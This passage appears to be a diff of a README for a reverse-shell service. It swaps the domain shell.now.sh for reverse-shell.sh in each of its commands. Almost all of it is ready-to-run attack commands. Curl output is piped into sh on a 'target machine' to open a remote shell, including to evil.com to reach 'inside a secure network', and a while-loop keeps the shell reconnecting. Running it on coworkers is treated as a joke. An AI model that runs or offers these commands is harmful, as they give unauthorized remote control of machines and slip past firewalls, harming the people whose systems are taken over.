On the target machine, pipe the output of https://shell.now.sh/yourip:port into sh.
On the target machine, pipe the output of https://reverse-shell.sh/yourip:port into sh.
```shell
curl https://shell.now.sh/192.168.0.69:1337 | sh
curl https://reverse-shell.sh/192.168.0.69:1337 | sh
```
Go back to your machine, you should now have a shell prompt.
@ -44,7 +44,7 @@ This is meant to be used for pentesting or helping coworkers understand why they
You can use a hostname instead of an IP.
```shell
curl https://shell.now.sh/localhost:1337 | sh
curl https://reverse-shell.sh/localhost:1337 | sh
```
### Remote connections
@ -54,7 +54,7 @@ Because this is a reverse connection it can punch through firewalls and connect
You could listen for connections on a server at evil.com and get a reverse shell from inside a secure network with.
```shell
curl https://shell.now.sh/evil.com:1337 | sh
curl https://reverse-shell.sh/evil.com:1337 | sh
```
### Reconnecting
@ -62,7 +62,7 @@ curl https://shell.now.sh/evil.com:1337 | sh
By default when the shell exits you lose your connection. You may do this by accident with an invalid command. You can easily create a shell that will attempt to reconnect by wrapping it in a while loop.
```shell
while true; do curl https://shell.now.sh/yourip:1337 | sh; done
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
```
Be careful if you do this to a coworker, if they leave the office with this still running you're opening them up to attack.